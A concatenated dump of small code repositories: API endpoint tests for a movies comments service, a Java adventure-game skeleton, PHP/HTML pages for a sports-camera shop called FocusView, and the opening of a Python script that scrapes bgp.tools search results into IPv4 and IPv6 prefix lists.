    request(server)
      .get('/comments?limit=0')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect('Content-Length', '2')
      .expect(200)
      .then(res => {
        expect(res.body.length).to.be.equal(0)
        done()
      })
      .catch(done)
  })
  it('works with negative limit', done => {
    request(server)
      .get('/comments?limit=-10')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works with only content field', done => {
    request(server)
      .get('/comments?fields=content')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200)
      .then(res => {
        expect(res.body[0]).to.have.keys('content')
        done()
      })
      .catch(done)
  })
  it('works with unknown fields', done => {
    request(server)
      .get('/movies?fields=Pizza')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
  it('works fine with strange data', done => {
    request(server)
      .get('/comments?whoareyou=thewinner')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(200, done)
  })
})
// Tests for POST /comments: required-field validation and creation.
// Failures inside .then are forwarded to mocha via .catch(done) (the
// original swallowed them with console.error and timed out).
describe('POST /comments', () => {
  it('throws an error while no arguments', done => {
    request(server)
      .post('/comments')
      .expect(400, done)
  })
  it('throws an error while no movie ID', done => {
    request(server)
      .post('/comments')
      .send('content=Bizzaire!')
      .expect(400, done)
  })
  it('throws an error while no content', done => {
    request(server)
      .post('/comments')
      .send('movie=2')
      .expect(400, done)
  })
  it('throws 404 when no movie found', done => {
    request(server)
      .post('/comments')
      .send('content=Obnoxious!')
      .send('movie=777')
      .expect(404, done)
  })
  it('works fine when it should to', done => {
    request(server)
      .post('/comments')
      .send('movie=2')
      .send('content=Bizzare!')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(201)
      .then(res => {
        expect(res.body).to.have.keys('movieID', 'content')
        done()
      })
      .catch(done)
  })
  it('works fine with strange data', done => {
    request(server)
      .post('/comments')
      .send('movie=2')
      .send('content=Bizzare!')
      .send('shouldyouhireme=yesplz')
      .expect('Content-Type', 'application/json; charset=utf-8')
      .expect(201)
      .then(res => {
        expect(res.body).to.have.keys('movieID', 'content')
        done()
      })
      .catch(done)
  })
})
| 458ef7a0d7e00fecc7cac39749834a25356036ff | [
"JavaScript"
] | 1 | JavaScript | fossabot/movies-api | b31cb45930af4acf632be43e2d2868220594be49 | 95d5e318ccbee332853fd54c4003927e57fd07f8 |
refs/heads/master | <repo_name>TA2014Cooperation/V1<file_sep>/src/Simon/Character.java
package Simon;
/**
 * A playable character with basic RPG attributes and accessors.
 *
 * NOTE(review): the class name shadows java.lang.Character; a rename
 * (e.g. GameCharacter) would avoid confusion with the JDK class.
 */
public class Character {

    String Name;      // display name
    int STR;          // strength
    int INT;          // intelligence
    int VERT;         // presumably "Verteidigung" (defense) — TODO confirm
    int HP;           // hit points
    int[][] Position; // position data; exact layout unclear — TODO confirm

    public String getName() {
        return Name;
    }

    public void setName(String name) {
        Name = name;
    }

    public int getSTR() {
        return STR;
    }

    public void setSTR(int sTR) {
        STR = sTR;
    }

    public int getINT() {
        return INT;
    }

    public void setINT(int iNT) {
        INT = iNT;
    }

    public int getVERT() {
        return VERT;
    }

    public void setVERT(int vERT) {
        VERT = vERT;
    }

    public int getHP() {
        return HP;
    }

    public void setHP(int hP) {
        HP = hP;
    }

    public int[][] getPosition() {
        return Position;
    }

    public void setPosition(int[][] position) {
        Position = position;
    }

    // Derived-stat formulas kept from the original author (not active):
    // int Attack = STR + (10*INT)/STR;
    // int Abwehr = (int) (VERT + (0.25 * INT));
}
<file_sep>/README.md
Adventure Ideen Sammlung:
- Karte
- NPC
- Stats
- Items
-
<file_sep>/src/Adventure/Kampf.java
package Adventure;
public class Kampf {
//Abwehren
public static boolean abwehren(int STG, int INT, int VERT){
if (STG==0){
STG=2;
}
return false;
}
}
<file_sep>/src/Adventure/Main.java
package Adventure;
/** Entry point for the Adventure game (skeleton only). */
public class Main {

    public static void main(String[] args){
        // Planned game loop:
        //READ
        //PROCESS
        //WRITE
    }

    // Pre-built standardized output (exactly 25 lines are possible).
    // Not yet implemented.
    public void Ausgabe(){
    }
}
<file_sep>/src/Adventure/Karte.java
package Adventure;
/** Placeholder for the game map; not yet implemented. */
public class Karte {
}
| 2ba6da4b7de933a58b1606b2723fe09c2134d4f8 | [
"Markdown",
"Java"
] | 5 | Java | TA2014Cooperation/V1 | 9b86b0c0167d7e98810f3774fa9ca0e10f44d138 | 7cf7d8e6697bb1a7d6e8a6a3016ae3f6df39dd3f |
refs/heads/master | <file_sep><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<title>Ayuda</title>
</head>
<body>
<!-- En esta parte va lo que es el nav que esta fijo -->
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!--Esta es la seccion de ayuda -->
<!-- Aqui va la historia de la empresa -->
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">Ayuda</h1>
<p class="lead">En esta seccion vemos las preguntas mas frecuentes que se presentan cuando entras a la pagina.
<br><br>
<b>¿Como hago para comprar una camara?</b>
<br>
Respuesta: Nuestra pagina esta hecha para que de una manera simple y sencilla puedas
adquirir nuestros productos eficazmente.
<br><br>
<b>¿Mis productos me llegan a casa?</b>
<br>
Respuesta: Los productos adquiridos te llegan completamente seguros a tu casa en el tiempo estimado de compra.
<br>
<br>
<b>¿Que productos cubren la garantia?</b>
<br>
Respuesta: Todos nuestros productos tienen garantia de un plazo de un mes, si el producto te llega
defectuoso, la empresa se hace cargo de hacerte de inmediato un cambio de producto.
De acuerdo con el nuestras normas y politicas de la empresa tiene que pasa un procedimiento de revision
para ver si el producto realmente esta malo.<br><br>
Informar sobre infracciones de nuestras políticas
Investigamos las infracciones de nuestras políticas e insistimos en que se den las explicaciones pertinentes. Si identificas una infracción, indícanoslo inmediatamente.
Ejemplos de infracción de nuestras políticas:<br><br>
Un comprador no paga un artículo.<br><br>
Se realiza una oferta para completar la transacción fuera de eBay.<br><br>
Un usuario envía correo no solicitado (spam) a otro.<br><br>
Infracciones de los derechos de propiedad intelectual y marcas registradas.<br><br>
Un comprador amenaza con darte una valoración negativa si no cumples determinadas peticiones.
<br><br>
<b>¿Como hago para comprar una camara?</b>
<br>
Respuesta: Nuestra pagina esta hecha para que de una manera simple y sencilla puedas
adquirir nuestros productos eficazmente.
</p>
</div>
</div>
<!-- -->
<!-- Va el footer que lo manda a llamar -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep><?php
/*Creamos una clase con una funcion que imprime el codigo html del nav
para ahorrar codigo y colocar el nav */
class basefooter{
static function bfooter(){
print('
<footer id="footer" class="page-footer font-small pt-4 text-white">
<!-- Footer Links -->
<div class="container text-center text-md-left">
<!-- Footer links -->
<div class="row text-center text-md-left mt-3 pb-3">
<!-- Grid column -->
<div class="col-md-3 col-lg-3 col-xl-3 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">FocusView</h6>
<p>Si realmente eres amante de los deporte entonces compra algo que te dejara recuerdos
en todo momento y que siempre seras un gran deportista...
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div id="link" class="col-md-2 col-lg-2 col-xl-2 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Productos</h6>
<p>
<a href="#!">FocusView Mercury</a>
</p>
<p>
<a href="#!">FocusView XS</a>
</p>
<p>
<a href="#!">FocusView Xpro</a>
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div id="link" class="col-md-3 col-lg-2 col-xl-2 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Links mas usados</h6>
<p>
<a href="https://www.facebook.com/">Facebook</a>
</p>
<p>
<a href="https://www.youtube.com/">Youtube</a>
</p>
<p>
<a href="https://www.instagram.com/?hl=es-la">Instagram</a>
</p>
<p>
<a href="https://twitter.com/?lang=es">Twitter</a>
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div class="col-md-4 col-lg-3 col-xl-3 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Contáctenos</h6>
<p>
<i class="fas fa-home mr-3"></i> San Salvador, SV 10012, ES</p>
<p>
<i class="fas fa-envelope mr-3"></i><EMAIL></p>
<p>
<i class="fas fa-phone mr-3"></i> + 503 77213922</p>
<p>
<i class="fas fa-print mr-3"></i> + 503 78321389</p>
</div>
<!-- Grid column -->
</div>
<!-- Footer links -->
<hr>
<!-- Grid row -->
<div class="row d-flex align-items-center">
<!-- Grid column -->
<div class="col-md-7 col-lg-8">
<!--Copyright-->
<p class="text-center text-md-left">© 2018 Copyright:
<strong >FocusView.com</strong>
</a>
</p>
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-md-5 col-lg-4 ml-lg-0">
<!-- Social buttons -->
<div class="text-center text-md-right">
<ul class="list-unstyled list-inline">
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-facebook-f"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-twitter"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-google-plus-g"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-linkedin-in"></i>
</a>
</li>
</ul>
</div>
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</div>
<!-- Footer Links -->
</footer>
');
}
}
<file_sep><!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<link rel="alternate" href="atom.xml" type="application/atom+xml" title="Atom">
<title>FocusView - Inicio</title>
</head>
<body>
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!--Esta parte es la del carousel-->
<div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel">
<ol class="carousel-indicators">
<li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
</div>
<a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
  <span class="carousel-control-next-icon" aria-hidden="true"></span>
  <span class="sr-only">Next</span>
</a>
</div>
<!--En esta parte va un pequeño contenedor para las camaras mas vendidas-->
<br><br><br><br>
<div class="container">
<div class="row">
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView Mercury</h5>
<p class="card-text">Camara mercury especial para los deportes extremos con resistencia a todo tipo de climas</p>
<form id="form">
<p class="clasificacion">
<input id="radio1" type="radio" name="estrellas" value="5"><!--
--><label for="radio1">★</label><!--
--><input id="radio2" type="radio" name="estrellas" value="4"><!--
--><label for="radio2">★</label><!--
--><input id="radio3" type="radio" name="estrellas" value="3"><!--
--><label for="radio3">★</label><!--
--><input id="radio4" type="radio" name="estrellas" value="2"><!--
--><label for="radio4">★</label><!--
--><input id="radio5" type="radio" name="estrellas" value="1"><!--
--><label for="radio5">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">Comprar</a>
</div>
</div>
</div>
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo2.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView Pro</h5>
<p class="card-text">Camara de alta calidad que graba a 4k con resistencia al agua y al polvo</p>
<br>
<form id="form">
<p class="clasificacion">
<input id="radio6" type="radio" name="estrellas" value="5"><!--
--><label for="radio6">★</label><!--
--><input id="radio7" type="radio" name="estrellas" value="4"><!--
--><label for="radio7">★</label><!--
--><input id="radio8" type="radio" name="estrellas" value="3"><!--
--><label for="radio8">★</label><!--
--><input id="radio9" type="radio" name="estrellas" value="2"><!--
--><label for="radio9">★</label><!--
--><input id="radio10" type="radio" name="estrellas" value="1"><!--
--><label for="radio10">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">Comprar</a>
</div>
</div>
</div>
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView XPro</h5>
<p class="card-text">Camara especializada al agua, sumergible hasta 30 metros de profundidad</p>
<form id="form">
<p class="clasificacion">
<input id="radio11" type="radio" name="estrellas" value="5"><!--
--><label for="radio11">★</label><!--
--><input id="radio12" type="radio" name="estrellas" value="4"><!--
--><label for="radio12">★</label><!--
--><input id="radio13" type="radio" name="estrellas" value="3"><!--
--><label for="radio13">★</label><!--
--><input id="radio14" type="radio" name="estrellas" value="2"><!--
--><label for="radio14">★</label><!--
--><input id="radio15" type="radio" name="estrellas" value="1"><!--
--><label for="radio15">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">Comprar</a>
</div>
</div>
</div>
</div>
</div>
<br><br><br><br><br>
<!--Esta parte es para otro header-->
<div id="link" class="card text-center white-text" style="background-color: #585858">
<div class="card-body">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link active" href="#">Activo</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Enlazar</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Nuevos Productos</a>
</li>
<li class="nav-item">
<a class="nav-link disable" href="#" tabindex="-1" aria-disable="true">Discapacitado</a>
</li>
</ul>
</div>
</div>
<br><br>
<!-- Parte de las categorias -->
<br>
<div class="container">
<div class="row">
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title"><br>Accesorios</h5>
<p class="card-text"><br>Camara mercury especial para los deportes extremos con resistencia a todo tipo de climas</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria2.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title"><br>Trípodes</h5>
<p class="card-text"><br><br>Camara de alta calidad que graba a 4k con resistencia al agua y al polvo</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria5.jpg" class="card-img-top" alt="..." >
<div class="card-body">
<h5 class="card-title">Cámaras acuáticas</h5>
<p class="card-text">Camara especializada al agua, sumergible hasta 30 metros de profundidad</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
</div>
</div>
<!-- En esta parte va el quienes somos -->
<br><br><br>
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">¿Quienes Somos?</h1>
<p class="lead">Nuestro Team de FocusView es completamente increible hace que todo lo que compres sea de una manera unica.</p>
</div>
</div>
<!-- En esta parte va sobre nosotros personas que ayudaron a la pagina -->
<br>
<div class="container">
<div class="row">
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/gerar3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<p class="card-text"><b>"Siempre creí que el exito se alcanza logrando todo lo que te propongas"</b><br><br><NAME>.</p>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/eze2.jpg" class="card-img-top" alt="..." width="" height="280">
<div class="card-body">
<p class="card-text"><b>"La mayoria de personas piensan que no pueden lograr las cosas por si mismos, yo les digo el que no arriesga no gana"</b><br><br><NAME></p>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/carlos2.jpg" class="card-img-top" alt="..." width="" height="280">
<div class="card-body">
<p class="card-text"><b>“Las oportunidades no pasan, las creas, He fallado una y otra vez y es por ello que he tenido éxito”</b><br><br><NAME></p>
</div>
</div>
</div>
</div>
</div>
</div>
<br><br>
<!-- En esta parte se encuentra el footer de la pagina -->
<!-- Footer -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- Footer -->
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep><?php
class estrellas{
static function estrella(){
print('
<form id="form">
<p class="clasificacion">
<input id="radio1" type="radio" name="estrellas" value="5"><!--
--><label for="radio1">★</label><!--
--><input id="radio2" type="radio" name="estrellas" value="4"><!--
--><label for="radio2">★</label><!--
--><input id="radio3" type="radio" name="estrellas" value="3"><!--
--><label for="radio3">★</label><!--
--><input id="radio4" type="radio" name="estrellas" value="2"><!--
--><label for="radio4">★</label><!--
--><input id="radio5" type="radio" name="estrellas" value="1"><!--
--><label for="radio5">★</label>
</p>
</form>
');
}
}<file_sep><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<title>Quienes Somos</title>
</head>
<body>
<!-- En esta parte va lo que es el nav que esta fijo -->
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!-- Una barra -->
<div class="shadow p-3 mb-5 bg-white rounded"></div>
<!-- Aqui va la historia de la empresa -->
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">Quienes Somos</h1>
<p class="lead">Nuestro Team de FocusView es completamente increible hace que todo lo que compres sea de una manera unica.
<br><br> Nosotros nos encargamos de Proporcionar a la comunidad deportiva cámaras de alta gama al mismo tiempo tendrán un registro de todo lo que han hecho mientras realizan estas actividades, esta empresa FocusView funcionara vendiendo cámaras deportivas resistentes
a los diversos tipos de ambientes y deportes extremos, con lentes de vista panorámica, excelente calidad de imagen; contando estas con una gran capacidad de almacenamiento para poder así satisfacer las necesidades más exigentes de nuestros clientes.
</p>
</div>
</div>
<!-- Aqui va una pequeña descripcion de lo que es la historia de la empresa -->
<!-- Section: Blog v.3 -->
<section class="my-5">
<!-- Section heading -->
<h2 class="h1-responsive font-weight-bold text-center my-5">Nuestro Orgullo</h2>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<br><br>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejor Empresa de Camaras Deportivas</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<br><br>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post2.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<br><br>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejores camara con estabilizador de imagen</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas con estabilizador de imagen desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<br><br>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post3.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejor Empresa de grabacion de video</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas que tiene la mejor grabacion de video desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
</section>
<!-- -->
<br><br>
<!-- Aqui va mision y vision-->
<!-- aqui el ceo -->
<div class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">CEOs</h1>
<p class="lead"></p>
</div>
</div>
<!-- aqui van nuestras identidades -->
<section class="text-center my-5">
<!-- Section heading -->
<!-- Section description -->
<p class="dark-grey-text w-responsive mx-auto mb-5">
</p>
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-4 col-md-12 mb-lg-0 mb-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/carlos2.jpg" alt="Sample image" width="420" >
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="pink-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-map pr-2"></i>JAVASCRIPT EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong><NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, actualemente es un emprendedor de tiempo completo que ayuda a resolver problemas
para la comunidad y desarrolla tecnologia a todas personas que necesitan.</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-4 col-md-6 mb-md-0 mb-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/eze2.jpg" alt="Sample image" width="320">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="deep-orange-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-graduation-cap pr-2"></i>PHP EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong>Ezequ<NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, me encanta la tecnologia creo que se puede aplicar en muchos campos hoy en dia y que sin duda
esta para que nosotros la aprovechemos al maximo.
</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-4 col-md-6 mb-0">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/gerar3.jpg" alt="Sample image" width="420">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="blue-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-fire pr-2"></i>PYTHON EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong><NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, cuando era pequeño super que la tecnologia me atraia y que hoy en dia es muy escensial para nuestra vida diaria
y para poder progresar como raza humana.
</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</section>
<br><br>
<!-- Donde estamos ubicados -->
<!-- Section: Blog v.4 -->
<section class="my-5">
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-md-12">
<!-- Card -->
<div class="card card-cascade wider reverse">
<!-- Card image -->
<div class="view view-cascade overlay">
<img class="card-img-top" src="../../resources/img/bannershido.jpg" alt="Sample image">
<a href="#!">
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Card content -->
<div class="card-body card-body-cascade text-center">
<!-- Title -->
<h2 class="font-weight-bold"><a>FocusView</a></h2>
<!-- Social shares -->
<div class="social-counters">
<!-- Facebook -->
<a class="btn btn-fb">
<i class="fab fa-facebook-f pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Facebook</span>
</a>
<span class="counter">46</span>
<!-- Twitter -->
<a class="btn btn-tw">
<i class="fab fa-twitter pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Twitter</span>
</a>
<span class="counter">22</span>
<!-- Google+ -->
<a class="btn btn-gplus">
<i class="fab fa-google-plus-g pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Google+</span>
</a>
<span class="counter">31</span>
<!-- Comments -->
<a class="btn btn-default">
<i class="far fa-comments pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Comments</span>
</a>
<span class="counter">18</span>
</div>
<!-- Social shares -->
</div>
<!-- Card content -->
</div>
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</section>
<!-- Section: Blog v.4 -->
<!-- Va el footer que lo manda a llamar -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- -->
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep>$(document).ready(function() {
// aqui el código
});<file_sep><?php
/*Creamos una clase con una funcion que imprime el codigo html del header
para ahorrar codigo y colocar el header */
class baseheader {
static function bhead(){
print('
<br>
<div class="Conteiner">
<!-- Esta es la seccion de de el header -->
<div id="link" class="text-center white-text " style="background-color: #000000">
<div class="card-body">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link active" href="#home">Inicio</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#footer">Contáctenos</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Nuevos Productos</a>
</li>
<li class="nav-item">
<a class="nav-link disable" href="#nosotros" tabindex="-1" aria-disable="true">Sobre Nosotros</a>
</li>
</ul>
</div>
</div>
<!--esta parte es la barra de navegacion -->
<nav class="navbar navbar-expand-lg navbar-light fixed-top" style="background-color: #000000">
<form class="form-inline my-2 my-lg-0">
<input class="form-control mr-sm-2" type="text" placeholder="Search">
<button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
</form>
<button class="navbar-toggler-dark" type="button" data-toggle="collapse" data-target="#collapsibleNavId" aria-controls="collapsibleNavId"
aria-expanded="false" aria-label="Toggle navigation"></button>
<div id="link" class="collapse navbar-collapse" id="collapsibleNavId">
<ul class="navbar-nav mt-2 mt-lg-0 ml-auto">
<li class="nav-item active">
<a class="nav-link" href="#">Iniciar Sesion<span class="sr-only">(current)</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">Comprar</a>
</li>
</ul>
</div>
</nav>
</div>
');
}
} | eeb564e33bcbeb68c86f0d4c3b30bb8b7affe3c0 | [
"JavaScript",
"PHP"
] | 7 | PHP | Ezejosue/PruebaExpo | c68649a7fdde8af66e019644a5f5609258fa4380 | 44f9c72611f7ec43183ab031804142965a15b4f0 |
refs/heads/master | <repo_name>ActorExpose/bgp-search<file_sep>/bgp_search.py
# v.0.1 - Written by SI9INT (https://twitter.com/si9int) | 2020-03
#!/usr/bin/env python3
import requests, argparse
from bs4 import BeautifulSoup as bs
ipv4 = []
ipv6 = []
def search(term):
# https://bgp.tools
result = requests.get('https://bgp.tools/search?q=' + term).text
html = bs(result, 'html.parser')
for tr in html.find_all('tr'):
try:
inetnum = tr.find('a').text
desc = tr.find_all('td', {'class' : 'nowrap'})[1].text
cc = tr.find_all('td', {'class' : 'nowrap'})[0].img.get('alt')
if not inetnum.startswith('AS'):
if '::' in inetnum:
ipv6.append((inetnum, desc, cc))
else:
ipv4.append((inetnum, desc, cc))
except AttributeError:
pass
